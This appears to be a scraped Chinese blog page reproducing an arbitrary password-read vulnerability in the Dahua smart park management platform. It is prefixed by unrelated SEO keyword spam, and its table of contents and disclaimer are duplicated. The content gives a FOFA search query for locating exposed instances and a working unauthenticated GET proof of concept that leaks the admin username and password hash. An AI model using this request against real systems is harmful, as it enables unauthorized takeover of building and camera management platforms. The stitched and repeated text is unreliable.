摄影欣赏网站哪个最好,wordpress怎么把文章字体变成黑色,制作公司网站教程,直播系统开发公司文章目录 大华智慧园区管理平台任意密码读取漏洞 复现0x01 前言0x02 漏洞描述0x03 影响平台0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 大华智慧园区管理平台任意密码读取漏洞 复现
0x01 前言
免责声明#xff1a;请勿利用文章内的相关技术从事非法测试… 文章目录 大华智慧园区管理平台任意密码读取漏洞 复现0x01 前言0x02 漏洞描述0x03 影响平台0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 大华智慧园区管理平台任意密码读取漏洞 复现
0x01 前言
免责声明请勿利用文章内的相关技术从事非法测试由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失均由使用者本人负责所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用
0x02 漏洞描述
大华智慧园区综合管理平台是一款综合管理平台具备园区运营、资源调配和智能服务、摄像监控等功能。平台意在协助优化园区资源分配满足多元化的管理需求同时通过提供智能服务增强使用体验。
大华智慧园区综合管理平台存在任意密码读取漏洞可以直接读取管理账号名以及其密码Hash值造成未授权登入访问劫持园区管理平台危害性高。
0x03 影响平台
大华智慧园区综合管理平台0x04 漏洞环境
FOFA语法 app“dahua-智慧园区综合管理平台” 0x05 漏洞复现
1.访问漏洞环境 2.构造POC
POC GET
/admin/user_getUserInfoByUserName.action?userNamesystem3.复现 访问漏洞检测POC中的漏洞接口发现泄露了管理账号名system 及密码Hash值
